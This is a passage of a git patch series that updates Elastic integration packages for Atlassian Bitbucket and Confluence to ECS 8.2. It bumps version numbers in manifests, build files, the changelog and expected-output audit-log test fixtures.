--- a/packages/atlassian_bitbucket/manifest.yml +++ b/packages/atlassian_bitbucket/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: atlassian_bitbucket title: Atlassian Bitbucket -version: 1.1.0 +version: 1.2.0 license: basic description: Collect logs from Atlassian Bitbucket with Elastic Agent. type: integration From 54c2b3badaf7b490bded145af8c34c0f8af28731 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 12:18:34 -0600 Subject: [PATCH 04/23] Update atlassian_confluence to ECS 8.2 --- .../atlassian_confluence/_dev/build/build.yml | 2 +- packages/atlassian_confluence/changelog.yml | 5 + .../pipeline/test-audit-api.log-expected.json | 364 +++++++++--------- .../test-audit-files.log-expected.json | 128 +++--- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/audit/sample_event.json | 2 +- packages/atlassian_confluence/docs/README.md | 2 +- packages/atlassian_confluence/manifest.yml | 2 +- 8 files changed, 256 insertions(+), 251 deletions(-) diff --git a/packages/atlassian_confluence/_dev/build/build.yml b/packages/atlassian_confluence/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/atlassian_confluence/_dev/build/build.yml +++ b/packages/atlassian_confluence/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/atlassian_confluence/changelog.yml b/packages/atlassian_confluence/changelog.yml index 95ae0b2dc8c..f86bec1222c 100644 --- a/packages/atlassian_confluence/changelog.yml +++ b/packages/atlassian_confluence/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index 5417e402e36..a654fe9a7fa 100644 --- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -35,7 +35,7 @@ }, "@timestamp": "2021-11-23T00:44:36.398Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -118,7 +118,7 @@ }, "@timestamp": "2021-11-23T00:43:12.188Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -201,7 +201,7 @@ }, "@timestamp": "2021-11-23T00:41:45.280Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -284,7 +284,7 @@ }, "@timestamp": "2021-11-23T00:41:17.165Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -367,7 +367,7 @@ }, "@timestamp": "2021-11-23T00:41:16.741Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -450,7 +450,7 @@ }, "@timestamp": "2021-11-23T00:41:07.156Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -533,7 +533,7 @@ }, "@timestamp": "2021-11-23T00:41:06.871Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -616,7 +616,7 @@ }, "@timestamp": "2021-11-23T00:40:32.595Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -699,7 +699,7 @@ }, "@timestamp": "2021-11-23T00:40:32.138Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -792,7 +792,7 @@ }, "@timestamp": "2021-11-23T00:39:37.908Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -892,7 +892,7 @@ }, "@timestamp": "2021-11-23T00:39:37.904Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -992,7 +992,7 @@ }, "@timestamp": "2021-11-23T00:39:37.899Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1085,7 +1085,7 @@ }, "@timestamp": "2021-11-23T00:39:37.895Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1185,7 +1185,7 @@ }, "@timestamp": "2021-11-23T00:39:37.891Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1285,7 +1285,7 @@ }, "@timestamp": "2021-11-23T00:39:37.887Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1385,7 +1385,7 @@ }, "@timestamp": "2021-11-23T00:39:37.882Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1478,7 +1478,7 @@ }, "@timestamp": "2021-11-23T00:39:37.877Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1578,7 +1578,7 @@ }, "@timestamp": "2021-11-23T00:39:37.872Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1678,7 +1678,7 @@ }, "@timestamp": "2021-11-23T00:39:37.868Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1778,7 +1778,7 @@ }, "@timestamp": "2021-11-23T00:39:37.862Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1871,7 +1871,7 @@ }, "@timestamp": "2021-11-23T00:39:37.858Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1971,7 +1971,7 @@ }, "@timestamp": "2021-11-23T00:39:37.853Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2071,7 +2071,7 @@ }, "@timestamp": "2021-11-23T00:39:37.848Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2171,7 +2171,7 @@ }, "@timestamp": "2021-11-23T00:39:37.841Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2264,7 +2264,7 @@ }, "@timestamp": "2021-11-23T00:39:37.832Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2364,7 +2364,7 @@ }, "@timestamp": "2021-11-23T00:39:37.821Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2464,7 +2464,7 @@ }, "@timestamp": "2021-11-23T00:39:37.811Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2564,7 +2564,7 @@ }, "@timestamp": "2021-11-23T00:39:37.796Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2657,7 +2657,7 @@ }, "@timestamp": "2021-11-23T00:39:37.785Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2757,7 +2757,7 @@ }, "@timestamp": "2021-11-23T00:39:37.777Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2857,7 +2857,7 @@ }, "@timestamp": "2021-11-23T00:39:37.770Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2957,7 +2957,7 @@ }, "@timestamp": "2021-11-23T00:39:37.756Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3050,7 +3050,7 @@ }, "@timestamp": "2021-11-23T00:39:37.751Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3150,7 +3150,7 @@ }, "@timestamp": "2021-11-23T00:39:37.744Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3250,7 +3250,7 @@ }, "@timestamp": "2021-11-23T00:39:37.728Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3350,7 +3350,7 @@ }, "@timestamp": "2021-11-23T00:39:37.713Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3443,7 +3443,7 @@ }, "@timestamp": "2021-11-23T00:39:37.705Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3543,7 +3543,7 @@ }, "@timestamp": "2021-11-23T00:39:37.688Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3643,7 +3643,7 @@ }, "@timestamp": "2021-11-23T00:39:37.675Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3743,7 +3743,7 @@ }, "@timestamp": "2021-11-23T00:39:37.668Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3836,7 +3836,7 @@ }, "@timestamp": "2021-11-23T00:39:37.654Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3936,7 +3936,7 @@ }, "@timestamp": "2021-11-23T00:39:37.644Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4036,7 +4036,7 @@ }, "@timestamp": "2021-11-23T00:39:37.639Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4136,7 +4136,7 @@ }, "@timestamp": "2021-11-23T00:39:37.634Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4236,7 +4236,7 @@ }, "@timestamp": "2021-11-23T00:39:37.628Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4336,7 +4336,7 @@ }, "@timestamp": "2021-11-23T00:39:37.618Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4429,7 +4429,7 @@ }, "@timestamp": "2021-11-23T00:39:37.612Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4529,7 +4529,7 @@ }, "@timestamp": "2021-11-23T00:39:37.606Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4629,7 +4629,7 @@ }, "@timestamp": "2021-11-23T00:39:37.596Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4729,7 +4729,7 @@ }, "@timestamp": "2021-11-23T00:39:37.592Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4822,7 +4822,7 @@ }, "@timestamp": "2021-11-23T00:39:37.588Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4922,7 +4922,7 @@ }, "@timestamp": "2021-11-23T00:39:37.584Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5022,7 +5022,7 @@ }, "@timestamp": "2021-11-23T00:39:37.580Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5122,7 +5122,7 @@ }, "@timestamp": "2021-11-23T00:39:37.575Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5215,7 +5215,7 @@ }, "@timestamp": "2021-11-23T00:39:37.571Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5315,7 +5315,7 @@ }, "@timestamp": "2021-11-23T00:39:37.567Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5415,7 +5415,7 @@ }, "@timestamp": "2021-11-23T00:39:37.556Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5515,7 +5515,7 @@ }, "@timestamp": "2021-11-23T00:39:37.454Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5608,7 +5608,7 @@ }, "@timestamp": "2021-11-23T00:39:37.444Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5708,7 +5708,7 @@ }, "@timestamp": "2021-11-23T00:39:37.435Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5808,7 +5808,7 @@ }, "@timestamp": "2021-11-23T00:39:37.424Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5908,7 +5908,7 @@ }, "@timestamp": "2021-11-23T00:39:37.404Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6003,7 +6003,7 @@ }, "@timestamp": "2021-11-23T00:39:37.393Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6091,7 +6091,7 @@ }, "@timestamp": "2021-11-23T00:39:37.375Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6179,7 +6179,7 @@ }, "@timestamp": "2021-11-23T00:39:37.366Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6267,7 +6267,7 @@ }, "@timestamp": "2021-11-23T00:39:37.361Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6355,7 +6355,7 @@ }, "@timestamp": "2021-11-23T00:39:37.357Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6443,7 +6443,7 @@ }, "@timestamp": "2021-11-23T00:39:37.350Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6531,7 +6531,7 @@ }, "@timestamp": "2021-11-23T00:39:37.342Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6612,7 +6612,7 @@ }, "@timestamp": "2021-11-23T00:39:37.330Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6700,7 +6700,7 @@ }, "@timestamp": "2021-11-23T00:39:37.324Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6788,7 +6788,7 @@ }, "@timestamp": "2021-11-23T00:39:37.311Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6876,7 +6876,7 @@ }, "@timestamp": "2021-11-23T00:39:37.303Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6964,7 +6964,7 @@ }, "@timestamp": "2021-11-23T00:39:37.295Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7052,7 +7052,7 @@ }, "@timestamp": "2021-11-23T00:39:37.290Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7133,7 +7133,7 @@ }, "@timestamp": "2021-11-23T00:39:37.285Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7221,7 +7221,7 @@ }, "@timestamp": "2021-11-23T00:39:37.282Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7309,7 +7309,7 @@ }, "@timestamp": "2021-11-23T00:39:37.278Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7397,7 +7397,7 @@ }, "@timestamp": "2021-11-23T00:39:37.274Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7478,7 +7478,7 @@ }, "@timestamp": "2021-11-23T00:39:37.270Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7566,7 +7566,7 @@ }, "@timestamp": "2021-11-23T00:39:37.266Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7654,7 +7654,7 @@ }, "@timestamp": "2021-11-23T00:39:37.262Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7742,7 +7742,7 @@ }, "@timestamp": "2021-11-23T00:39:37.258Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7823,7 +7823,7 @@ }, "@timestamp": "2021-11-23T00:39:37.254Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7911,7 +7911,7 @@ }, "@timestamp": "2021-11-23T00:39:37.250Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7999,7 +7999,7 @@ }, "@timestamp": "2021-11-23T00:39:37.246Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8087,7 +8087,7 @@ }, "@timestamp": "2021-11-23T00:39:37.242Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8168,7 +8168,7 @@ }, "@timestamp": "2021-11-23T00:39:37.238Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8256,7 +8256,7 @@ }, "@timestamp": "2021-11-23T00:39:37.234Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8344,7 +8344,7 @@ }, "@timestamp": "2021-11-23T00:39:37.230Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8432,7 +8432,7 @@ }, "@timestamp": "2021-11-23T00:39:37.225Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8513,7 +8513,7 @@ }, "@timestamp": "2021-11-23T00:39:37.221Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8601,7 +8601,7 @@ }, "@timestamp": "2021-11-23T00:39:37.217Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8689,7 +8689,7 @@ }, "@timestamp": "2021-11-23T00:39:37.212Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8777,7 +8777,7 @@ }, "@timestamp": "2021-11-23T00:39:37.208Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8858,7 +8858,7 @@ }, "@timestamp": "2021-11-23T00:39:37.204Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8946,7 +8946,7 @@ }, "@timestamp": "2021-11-23T00:39:37.200Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9034,7 +9034,7 @@ }, "@timestamp": "2021-11-23T00:39:37.194Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9122,7 +9122,7 @@ }, "@timestamp": "2021-11-23T00:39:37.188Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9203,7 +9203,7 @@ }, "@timestamp": "2021-11-23T00:39:37.176Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9284,7 +9284,7 @@ }, "@timestamp": "2021-11-23T00:39:37.166Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9372,7 +9372,7 @@ }, "@timestamp": "2021-11-23T00:39:37.160Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9460,7 +9460,7 @@ }, "@timestamp": "2021-11-23T00:39:37.155Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9548,7 +9548,7 @@ }, "@timestamp": "2021-11-23T00:39:37.149Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9629,7 +9629,7 @@ }, "@timestamp": "2021-11-23T00:39:37.143Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9717,7 +9717,7 @@ }, "@timestamp": "2021-11-23T00:39:37.137Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9805,7 +9805,7 @@ }, "@timestamp": "2021-11-23T00:39:37.132Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9893,7 +9893,7 @@ }, "@timestamp": "2021-11-23T00:39:37.128Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9981,7 +9981,7 @@ }, "@timestamp": "2021-11-23T00:39:37.122Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10069,7 +10069,7 @@ }, "@timestamp": "2021-11-23T00:39:37.115Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10150,7 +10150,7 @@ }, "@timestamp": "2021-11-23T00:39:37.107Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10238,7 +10238,7 @@ }, "@timestamp": "2021-11-23T00:39:37.099Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10326,7 +10326,7 @@ }, "@timestamp": "2021-11-23T00:39:37.091Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10414,7 +10414,7 @@ }, "@timestamp": "2021-11-23T00:39:37.055Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10495,7 +10495,7 @@ }, "@timestamp": "2021-11-23T00:39:37.008Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10596,7 +10596,7 @@ }, "@timestamp": "2021-11-23T00:39:36.900Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10671,7 +10671,7 @@ }, "@timestamp": "2021-11-23T00:39:36.323Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10755,7 +10755,7 @@ }, "@timestamp": "2021-11-23T00:39:11.067Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10839,7 +10839,7 @@ }, "@timestamp": "2021-11-23T00:38:58.965Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10923,7 +10923,7 @@ }, "@timestamp": "2021-11-23T00:38:57.393Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -11007,7 +11007,7 @@ }, "@timestamp": "2021-11-23T00:38:42.240Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -11091,7 +11091,7 @@ }, "@timestamp": "2021-11-23T00:38:35.211Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -11160,7 +11160,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -11236,7 +11236,7 @@ }, "@timestamp": "2021-11-23T00:35:04.306Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -11332,7 +11332,7 @@ }, "@timestamp": "2021-11-23T00:35:04.305Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -11421,7 +11421,7 @@ }, "@timestamp": "2021-11-23T00:35:04.303Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -11517,7 +11517,7 @@ }, "@timestamp": "2021-11-23T00:35:04.301Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -11613,7 +11613,7 @@ }, "@timestamp": "2021-11-23T00:35:04.299Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -11702,7 +11702,7 @@ }, "@timestamp": "2021-11-23T00:35:04.298Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -11798,7 +11798,7 @@ }, "@timestamp": "2021-11-23T00:35:04.296Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -11894,7 +11894,7 @@ }, "@timestamp": "2021-11-23T00:35:04.294Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -11983,7 +11983,7 @@ }, "@timestamp": "2021-11-23T00:35:04.292Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -12079,7 +12079,7 @@ }, "@timestamp": "2021-11-23T00:35:04.290Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -12175,7 +12175,7 @@ }, "@timestamp": "2021-11-23T00:35:04.288Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -12264,7 +12264,7 @@ }, "@timestamp": "2021-11-23T00:35:04.287Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -12360,7 +12360,7 @@ }, "@timestamp": "2021-11-23T00:35:04.285Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -12456,7 +12456,7 @@ }, "@timestamp": "2021-11-23T00:35:04.283Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -12545,7 +12545,7 @@ }, "@timestamp": "2021-11-23T00:35:04.281Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -12641,7 +12641,7 @@ }, "@timestamp": "2021-11-23T00:35:04.279Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -12737,7 +12737,7 @@ }, "@timestamp": "2021-11-23T00:35:04.277Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -12826,7 +12826,7 @@ }, "@timestamp": "2021-11-23T00:35:04.275Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -12922,7 +12922,7 @@ }, "@timestamp": "2021-11-23T00:35:04.273Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13018,7 +13018,7 @@ }, "@timestamp": "2021-11-23T00:35:04.271Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13107,7 +13107,7 @@ }, "@timestamp": "2021-11-23T00:35:04.269Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13203,7 +13203,7 @@ }, "@timestamp": "2021-11-23T00:35:04.267Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13299,7 +13299,7 @@ }, "@timestamp": "2021-11-23T00:35:04.265Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13388,7 +13388,7 @@ }, "@timestamp": "2021-11-23T00:35:04.262Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13484,7 +13484,7 @@ }, "@timestamp": "2021-11-23T00:35:04.259Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13580,7 +13580,7 @@ }, "@timestamp": "2021-11-23T00:35:04.257Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13676,7 +13676,7 @@ }, "@timestamp": "2021-11-23T00:35:04.255Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13765,7 +13765,7 @@ }, "@timestamp": "2021-11-23T00:35:04.253Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13861,7 +13861,7 @@ }, "@timestamp": "2021-11-23T00:35:04.251Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -13957,7 +13957,7 @@ }, "@timestamp": "2021-11-23T00:35:04.249Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -14046,7 +14046,7 @@ }, "@timestamp": "2021-11-23T00:35:04.247Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -14142,7 +14142,7 @@ }, "@timestamp": "2021-11-23T00:35:04.245Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -14238,7 +14238,7 @@ }, "@timestamp": "2021-11-23T00:35:04.242Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -14327,7 +14327,7 @@ }, "@timestamp": "2021-11-23T00:35:04.240Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -14423,7 +14423,7 @@ }, "@timestamp": "2021-11-23T00:35:04.238Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -14519,7 +14519,7 @@ }, "@timestamp": "2021-11-23T00:35:04.235Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -14608,7 +14608,7 @@ }, "@timestamp": "2021-11-23T00:35:04.231Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -14704,7 +14704,7 @@ }, "@timestamp": "2021-11-23T00:35:04.219Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -14800,7 +14800,7 @@ }, "@timestamp": "2021-11-23T00:35:04.192Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -14879,7 +14879,7 @@ }, "@timestamp": "2021-11-23T00:35:03.950Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -14968,7 +14968,7 @@ }, "@timestamp": "2021-11-23T00:35:03.924Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -15073,7 +15073,7 @@ }, "@timestamp": "2021-11-23T00:35:03.860Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { 